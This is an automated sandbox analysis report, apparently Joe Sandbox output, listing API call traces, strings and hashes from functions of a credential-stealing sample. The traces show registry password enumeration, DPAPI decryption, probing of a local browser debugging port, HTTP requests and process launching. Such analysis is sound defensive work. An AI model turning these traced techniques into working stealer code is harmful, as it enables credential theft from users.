                                                      • lstrcat.KERNEL32(00000000,00435564), ref: 009F1B47
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B76
                                                      • lstrlen.KERNEL32(00638B1C), ref: 009F1B8C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1BB3
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009F1BBE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1BED
                                                      • lstrlen.KERNEL32(00435564), ref: 009F1BFF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C20
                                                      • lstrcat.KERNEL32(00000000,00435564), ref: 009F1C2C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C5B
                                                      • lstrlen.KERNEL32(00638D70), ref: 009F1C71
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1C98
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009F1CA3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1CD2
                                                      • lstrlen.KERNEL32(00638D6C), ref: 009F1CE8
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1D0F
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009F1D1A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1D49
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1049500425-0
                                                      • Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                      • Instruction ID: 8725581a3fdb8e1afc8f9c17f33188d35206ee85560988e355942b5a345aa5f8
                                                      • Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                      • Instruction Fuzzy Hash: 6F914DB0640747DFD720AFB5CC88A2AB7EEEF54345F149829B985D3651DB78E840CBA0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4DAA
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 009E4DDC
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4E29
                                                      • lstrlen.KERNEL32(00435128), ref: 009E4E34
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4E51
                                                      • lstrcat.KERNEL32(00000000,00435128), ref: 009E4E5D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4E82
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4EAF
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009E4EBA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009E4EE1
                                                      • StrStrA.SHLWAPI(?,00000000), ref: 009E4EF3
                                                      • lstrlen.KERNEL32(?), ref: 009E4F07
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4F48
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4FCF
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E4FF8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E5021
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E5047
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E5074
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                      • API String ID: 4107348322-3310892237
                                                      • Opcode ID: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
                                                      • Instruction ID: 9a6b4f963121c8ecb3671f4918ab108846df8c09df4a0b9dd411cc68e27c2de2
                                                      • Opcode Fuzzy Hash: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
                                                      • Instruction Fuzzy Hash: 18B1C471A006869BCB21EF79DC85AAE7BFAEF94305F058529F805A7351DB74EC01CB90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D6E16
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D6E69
                                                      • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 009D6E7C
                                                      • StrCmpCA.SHLWAPI(?,00638C80), ref: 009D6E94
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009D6EBC
                                                      • HttpOpenRequestA.WININET(00000000,00435080,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 009D6EF7
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 009D6F1E
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D6F2D
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 009D6F4C
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009D6FA6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D7002
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 009D7024
                                                      • InternetCloseHandle.WININET(00000000), ref: 009D7035
                                                      • InternetCloseHandle.WININET(?), ref: 009D703F
                                                      • InternetCloseHandle.WININET(00000000), ref: 009D7049
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D706A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR
                                                      • API String ID: 3687753495-2861137601
                                                      • Opcode ID: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
                                                      • Instruction ID: 19ecffff0ab7ea31e89c06fb45867530b06454e038df8291e03d8061992619b2
                                                      • Opcode Fuzzy Hash: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
                                                      • Instruction Fuzzy Hash: D3816F71A81215ABEB20DFA4DC45FAEB7B9EF44704F148169F904E7380DB74AD058BA4
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC11A
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC14D
                                                      • lstrlen.KERNEL32(004353D4), ref: 009EC158
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EC178
                                                      • lstrcat.KERNEL32(00000000,004353D4), ref: 009EC184
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC1A7
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009EC1B2
                                                      • lstrlen.KERNEL32(0043540C), ref: 009EC1BD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC1DA
                                                      • lstrcat.KERNEL32(00000000,0043540C), ref: 009EC1E6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC20D
                                                      • lstrlen.KERNEL32(00435410), ref: 009EC22D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EC24F
                                                      • lstrcat.KERNEL32(00000000,00435410), ref: 009EC25B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EC281
                                                      • ShellExecuteEx.SHELL32(?), ref: 009EC2D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                                      • String ID: <
                                                      • API String ID: 4016326548-4251816714
                                                      • Opcode ID: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                      • Instruction ID: b0e3695742e1998e1d77f37a055116cd7bcf50c2b8038daa6b10f67e08ceffef
                                                      • Opcode Fuzzy Hash: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                      • Instruction Fuzzy Hash: 9761D8B1A042859BCB11AFB58C8976E7BB9EF45308F04442AF445E7352DB78CD02DB90
                                                      APIs
                                                      • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                      • InternetCloseHandle.WININET(00000000), ref: 00409139
                                                      • strlen.MSVCRT ref: 00409155
                                                      • InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091D2
                                                      • InternetCloseHandle.WININET(00000000), ref: 004091D9
                                                      • strlen.MSVCRT ref: 004091EA
                                                      • strlen.MSVCRT ref: 0040921D
                                                      • strlen.MSVCRT ref: 0040925E
                                                        • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                        • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                        • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                      • strlen.MSVCRT ref: 0040927C
                                                        • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                      • API String ID: 4166274400-2144369209
                                                      • Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                      • Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
                                                      • Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                      • Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009DB687
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB6D5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB700
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009DB708
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB730
                                                      • lstrlen.KERNEL32(00435214), ref: 009DB7A7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB7CB
                                                      • lstrcat.KERNEL32(00000000,00435214), ref: 009DB7D7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB800
                                                      • lstrlen.KERNEL32(00000000), ref: 009DB884
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB8AE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009DB8B6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB8DE
                                                      • lstrlen.KERNEL32(0043509C), ref: 009DB955
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB979
                                                      • lstrcat.KERNEL32(00000000,0043509C), ref: 009DB985
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DB9B5
                                                      • lstrlen.KERNEL32(?), ref: 009DBABE
                                                      • lstrlen.KERNEL32(?), ref: 009DBACD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DBAF5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      • Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                      • Instruction ID: 4842497ed0685af3812aeeb33a8ab6afb4f20cab3bf68c34e2237c54d32cdf24
                                                      • Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                      • Instruction Fuzzy Hash: 81022A70A41206CFCB24DF65C998B6ABBF9AF85309F19C06AE4099B361D775DC42CF90
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EDD62
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EDD95
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EDDA3
                                                      • lstrcat.KERNEL32(?,00638B0C), ref: 009EDDBD
                                                      • lstrcat.KERNEL32(?,?), ref: 009EDDD1
                                                      • lstrcat.KERNEL32(?,00638DD8), ref: 009EDDE5
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EDE15
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 009EDE1C
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EDE85
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 4230089145-0
                                                      • Opcode ID: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
                                                      • Instruction ID: fd5195b757d44b0046852343a01e3affd672b5befab3e255dc706b10f0b1a652
                                                      • Opcode Fuzzy Hash: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
                                                      • Instruction Fuzzy Hash: 1FB180B19002999FDB11EFA4CC889EE7BB9FF88300F148869F505A7250DB749E44CFA0
                                                      APIs
                                                        • Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495
                                                      • RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 009F39C4
                                                      • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009F39FE
                                                      • wsprintfA.USER32 ref: 009F3A29
                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 009F3A47
                                                      • RegCloseKey.ADVAPI32(?), ref: 009F3A55
                                                      • RegCloseKey.ADVAPI32(?), ref: 009F3A5F
                                                      • RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 009F3AA8
                                                      • lstrlen.KERNEL32(?), ref: 009F3ABD
                                                      • RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 009F3B2E
                                                      • RegCloseKey.ADVAPI32(?), ref: 009F3B79
                                                      • RegCloseKey.ADVAPI32(?), ref: 009F3B90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                                      • String ID: - $?
                                                      • API String ID: 13140697-712516993
                                                      • Opcode ID: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                      • Instruction ID: 4d050c5debdea0264014e97c9b8f24271f2f9d8fa13eb69a9a6aa045f42ad077
                                                      • Opcode Fuzzy Hash: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                      • Instruction Fuzzy Hash: D4915EB29002089FCB10DF94DC85AEEB7BAFB88315F148569F609AB211D7759E45CF90
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                      • strlen.MSVCRT ref: 004077BE
                                                      • StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                      • strlen.MSVCRT ref: 0040788D
                                                        • Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                        • Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                        • Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                        • Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                        • Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7
                                                      • strcpy_s.MSVCRT ref: 00407821
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                      • HeapFree.KERNEL32(00000000), ref: 00407833
                                                      • strlen.MSVCRT ref: 00407840
                                                      • strcpy_s.MSVCRT ref: 0040786A
                                                      • strlen.MSVCRT ref: 004078B4
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID: Password
                                                      • API String ID: 3893107980-3434357891
                                                      • Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                      • Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
                                                      • Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                      • Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009F18E8
                                                      • lstrcpy.KERNEL32(00000000,00638C44), ref: 009F1913
                                                      • lstrlen.KERNEL32(?,?,?,?), ref: 009F1920
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F193D
                                                      • lstrcat.KERNEL32(00000000,?), ref: 009F194B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F1971
                                                      • lstrlen.KERNEL32(00638AA8,?,?,?), ref: 009F1986
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009F19A9
                                                      • lstrcat.KERNEL32(00000000,00638AA8), ref: 009F19B1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F19D9
                                                      • ShellExecuteEx.SHELL32(?), ref: 009F1A14
                                                      • ExitProcess.KERNEL32 ref: 009F1A4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                                      • String ID: <
                                                      • API String ID: 3579039295-4251816714
                                                      • Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                      • Instruction ID: a6cc832ea6d846e92230ff3bcedcfb35a3794fb78385f4ba8647ebc53d2ed02e
                                                      • Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                      • Instruction Fuzzy Hash: 60514E7190161AEFDB11DFA4DC94AAEBBFEAF94304F00512AE505E3251DBB4AE41CBD0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F134
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F162
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
                                                      • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
                                                      • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                      • String ID: ERROR
                                                      • API String ID: 2137491262-2861137601
                                                      • Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                      • Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
                                                      • Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                      • Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(00A76A20,00639BD8,0000FFFF), ref: 0040A086
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
                                                      • lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
                                                      • lstrlenA.KERNEL32(00435210), ref: 0040A0F5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
                                                      • lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
